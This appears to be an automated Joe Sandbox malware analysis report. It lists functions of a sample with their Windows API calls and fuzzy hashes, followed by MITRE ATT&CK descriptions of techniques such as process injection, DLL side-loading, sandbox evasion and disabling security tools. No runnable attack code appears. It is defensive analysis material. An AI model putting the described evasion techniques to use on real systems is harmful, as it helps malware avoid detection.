Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340

Function 00000001400117FC Relevance: 6.3, APIs: 5, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140011855
HeapAlloc.KERNEL32 ref: 0000000140011890
LeaveCriticalSection.KERNEL32 ref: 00000001400118FB
HeapAlloc.KERNEL32 ref: 0000000140011910
InitializeCriticalSection.KERNEL32 ref: 0000000140011952

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: CriticalSection$AllocHeap$EnterInitializeLeave
String ID:
API String ID: 2544007295-0
Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700

Function 000000014000E824 Relevance: 6.3, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000014000E9C7
memset.MSVCRT ref: 000000014000E9D5
memset.MSVCRT ref: 000000014000E9E2
memset.MSVCRT ref: 000000014000E9F1
memset.MSVCRT ref: 000000014000E9FF

Part of subcall function 000000014000FEE4: memmove.MSVCRT ref: 000000014000FF5C

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: memset$memmove
String ID:
API String ID: 3527438329-0
Opcode ID: 8107c39c5f27bec561d5988f97495eada5f2ca3110369e4a1c4afdd5d8af0edf
Instruction ID: a94d66f0502d68e3f48ed78985175dce6facf9e9c189752d3e598d0e8768336a
Opcode Fuzzy Hash: 8107c39c5f27bec561d5988f97495eada5f2ca3110369e4a1c4afdd5d8af0edf
Instruction Fuzzy Hash: 2231F1B271064081FB16DA2BF4507ED6752E7DDBD0F848126EB1A87BAACE3EC542C740

Function 0000000140013227 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 273COMMON

Download Yara Rule

Strings

, xrefs: 000000014001324B
header crc mismatch, xrefs: 00000001400135F1
, xrefs: 0000000140013227

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID:
String ID: $ $header crc mismatch
API String ID: 0-4092041874
Opcode ID: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
Instruction ID: 7b7c0dcb7b367ac831aed03830ec8ef67ea91f0dce79e30e5349fd19ccede3bc
Opcode Fuzzy Hash: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
Instruction Fuzzy Hash: F6B1A4726002D48BE7A79B16C488BAE3BEAFB4CB94F164518FB854B3E1D775C940C740

Function 0000000140007A50 Relevance: 6.2, APIs: 4, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 0000000140007B33
wcsncpy.MSVCRT ref: 0000000140007B9F
wcsncpy.MSVCRT ref: 0000000140007BF9
HeapFree.KERNEL32 ref: 0000000140007C15

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: Heapwcsncpy$AllocFree
String ID:
API String ID: 1479455602-0
Opcode ID: 444aac35c6e92cb2e2b44cb887a84ba67d794b8c0e1605a2e872cde5a09e483e
Instruction ID: b6b9e846c04cb6e9a04139aff3d7e83eda40acee9614ff25bed0c888bce5a2ba
Opcode Fuzzy Hash: 444aac35c6e92cb2e2b44cb887a84ba67d794b8c0e1605a2e872cde5a09e483e
Instruction Fuzzy Hash: 3651B2B2B0068485EA66DF26A404BEA77E1F789BD4F588125EF5D477E5EB3CC542C300

Function 0000000140013801 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 105COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00000001400138AA

Strings

invalid stored block lengths, xrefs: 0000000140013840
, xrefs: 000000014001380B
, xrefs: 000000014001382B

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: memmove
String ID: $ $invalid stored block lengths
API String ID: 2162964266-1718185709
Opcode ID: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
Instruction ID: c92309fc0d38d6234d0408f55a04ce57e81ba093b92e9b8f78a366b710634dd8
Opcode Fuzzy Hash: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
Instruction Fuzzy Hash: F041AC726107A09BE7668F26C4847AD3BA9F70C7C4F215129FF4A4BBA4D735D890CB40

Function 000000014000C4F0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 000000014000C5A6
RtlLookupFunctionEntry.KERNEL32 ref: 000000014000C5E1
RtlVirtualUnwind.KERNEL32 ref: 000000014000C64C
RtlLookupFunctionEntry.KERNEL32 ref: 000000014000C672

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: EntryFunctionLookup$UnwindVirtual
String ID:
API String ID: 3286588846-0
Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700

Function 00000001400085F0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

CharLowerW.USER32 ref: 000000014000861A
CharLowerW.USER32 ref: 000000014000864F
CharLowerW.USER32 ref: 000000014000867D
CharLowerW.USER32 ref: 0000000140008688

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710

Function 00000001400174E0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 000000014001753E
malloc.MSVCRT ref: 0000000140017550
WideCharToMultiByte.KERNEL32 ref: 000000014001757B
malloc.MSVCRT ref: 0000000140017592

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
Instruction ID: eb7332db7f165f027367f4732026c4c5e1ffc84dd66e6814e4cbb0aaa670ffe8
Opcode Fuzzy Hash: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
Instruction Fuzzy Hash: 2C216532208B8086D725CF16B44079AB7A5F7887E4F488725FF9917BA5DF79C551C700

Function 000000014000DCA4 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderLocation.SHELL32 ref: 000000014000DCCD
SHGetPathFromIDListW.SHELL32 ref: 000000014000DCDF
wcslen.MSVCRT ref: 000000014000DCEC
CoTaskMemFree.OLE32 ref: 000000014000DD0F

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: FolderFreeFromListLocationPathTaskwcslen
String ID:
API String ID: 4012708801-0
Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300

Function 000000014001147C Relevance: 5.1, APIs: 4, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001149E
HeapAlloc.KERNEL32 ref: 0000000140011573
HeapAlloc.KERNEL32 ref: 0000000140011597
LeaveCriticalSection.KERNEL32 ref: 0000000140011600

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750

Function 000000014000D02C Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 000000014000D0B1
HeapAlloc.KERNEL32 ref: 000000014000D0C7
wcscpy.MSVCRT ref: 000000014000D0D7
memset.MSVCRT ref: 000000014000D111

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: AllocHeapmemsetwcscpywcslen
String ID:
API String ID: 1807340688-0
Opcode ID: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
Instruction ID: 6743f53f77a36836f55a7605488c5dfe466d4e7a0e85049e430ca513693cbf19
Opcode Fuzzy Hash: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
Instruction Fuzzy Hash: 6D3109B5605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518350

Function 000000014000CCD8 Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CE61
Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CE74
Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CE8F
Part of subcall function 000000014000CE30: HeapFree.KERNEL32 ref: 000000014000CEB1

HeapAlloc.KERNEL32 ref: 000000014000CD11
HeapAlloc.KERNEL32 ref: 000000014000CD42
HeapAlloc.KERNEL32 ref: 000000014000CDB2
HeapFree.KERNEL32 ref: 000000014000CDD8

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: Heap$Free$Alloc
String ID:
API String ID: 3901518246-0
Opcode ID: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
Instruction ID: 5bc8d6a19ab5820ea12ddcb4c1614eb0e390fbda2a9c6e8bfd6285e08278190a
Opcode Fuzzy Hash: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
Instruction Fuzzy Hash: B73142B2211B409BE702DF13EA807A977A4F788BC0F448429EB4847B65DF79E4A6C740

Function 00000001400112A8 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400112C4
HeapReAlloc.KERNEL32 ref: 0000000140011308
LeaveCriticalSection.KERNEL32 ref: 0000000140011355

Part of subcall function 0000000140011CB0: HeapAlloc.KERNEL32 ref: 0000000140011CC8

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350

Function 0000000140017410 Relevance: 5.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 0000000140017451
malloc.MSVCRT ref: 000000014001746B
MultiByteToWideChar.KERNEL32 ref: 0000000140017486
malloc.MSVCRT ref: 00000001400174A3

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
Instruction ID: 40dc39d6401ac23dbbf15f28fc1e93d87451d781889f5abbfcb2521dceb51717
Opcode Fuzzy Hash: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
Instruction Fuzzy Hash: 3A118F3260878086EB25CF66B41076ABBA5FB8CBE4F544328EF9D57BA5DF39C4118704

Function 0000000140011668 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001167F
HeapFree.KERNEL32 ref: 000000014001169A
HeapFree.KERNEL32 ref: 00000001400116BC
LeaveCriticalSection.KERNEL32 ref: 00000001400116E2

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300

Function 000000014000CE30 Relevance: 5.0, APIs: 4, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000D140: memset.MSVCRT ref: 000000014000D1C3

Part of subcall function 0000000140011968: EnterCriticalSection.KERNEL32 ref: 0000000140011985
Part of subcall function 0000000140011968: HeapFree.KERNEL32 ref: 00000001400119E7
Part of subcall function 0000000140011968: LeaveCriticalSection.KERNEL32 ref: 00000001400119F4

HeapFree.KERNEL32 ref: 000000014000CE61
HeapFree.KERNEL32 ref: 000000014000CE74
HeapFree.KERNEL32 ref: 000000014000CE8F
HeapFree.KERNEL32 ref: 000000014000CEB1

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

